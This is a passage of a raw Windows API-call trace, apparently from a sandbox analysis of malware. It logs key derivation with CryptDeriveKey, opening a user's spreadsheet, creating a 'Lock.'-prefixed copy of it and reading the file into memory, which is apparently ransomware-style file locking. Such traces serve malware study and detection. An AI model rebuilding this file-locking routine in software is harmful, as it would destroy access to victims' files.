lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0220.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71eb8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0220.010] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.010] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.010] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0220.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabcb0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0220.010] CryptHashData (hHash=0x9e1eb8, pbData=0x2a71ea8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0220.010] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.010] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.010] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0220.010] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0220.010] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0220.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabb18, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0220.010] CryptDeriveKey (in: hProv=0xa7bab0, Algid=0x6601, hBaseData=0x9e1eb8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2138) returned 1 [0220.010] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.010] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.010] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0220.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0220.011] CryptDestroyHash (hHash=0x9e1eb8) returned 1 [0220.011] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.011] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.011] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.011] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.011] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.011] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/oXBXXG.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\oxbxxg.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0220.011] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0220.011] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0220.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7200 [0220.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0220.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0220.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0220.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0220.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0220.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0220.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0220.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0220.012] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0220.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0220.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0220.012] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0220.012] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0220.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0220.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0220.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0220.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0220.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0220.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0220.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0220.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0220.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0220.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0220.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0220.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0220.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0220.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0220.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0220.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0220.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854038 [0220.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0220.013] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0220.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854038 | out: hHeap=0x2af0000) returned 1 [0220.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0220.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0220.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0220.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0220.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0220.014] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.oXBXXG.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.oxbxxg.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0220.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7100 [0220.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0220.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0220.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0220.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0220.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0220.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0220.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0220.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0220.015] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0220.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0220.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0220.015] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0220.015] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0220.015] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0220.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0220.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0220.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0220.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0220.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0220.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0220.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0220.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0220.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0220.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0220.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0220.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0220.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0220.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0220.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0220.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0220.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0220.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0220.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0220.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0220.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0220.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0220.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0220.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0220.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0220.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0220.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0220.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0220.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0220.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0220.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x54e8020 [0220.019] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0220.019] ReadFile (in: hFile=0x524, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0xa07d, lpOverlapped=0x0) returned 1 [0220.023] ReadFile (in: hFile=0x524, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0220.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0220.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0220.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0220.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0220.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa07d) returned 0x2a8a138 [0220.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x54e8020 | out: hHeap=0x2af0000) returned 1 [0220.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0220.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0220.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0220.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0220.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0220.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0220.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0220.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0220.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa07d) returned 0x2a941c0 [0220.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0220.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0220.027] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0220.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0220.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0220.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0220.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0220.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa07d) returned 0x2a8a138 [0220.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0220.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0220.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0220.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0220.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0220.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0220.028] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0220.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0220.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0220.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0220.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0220.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0220.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0220.028] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0220.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0220.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0220.028] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0220.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0220.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0220.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0220.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b58 [0220.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0220.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0220.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0220.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0220.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa07d) returned 0x2a8a138 [0220.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0220.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a28 [0220.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0220.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0220.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a48 [0220.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0220.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719d8 [0220.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0220.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0220.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0220.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaafa8 [0220.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0220.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0220.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0220.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0220.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0220.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0220.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0220.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa07d) returned 0x2aae878 [0220.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0220.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0220.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0220.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0220.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0220.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0220.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0220.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0220.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0220.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0220.031] 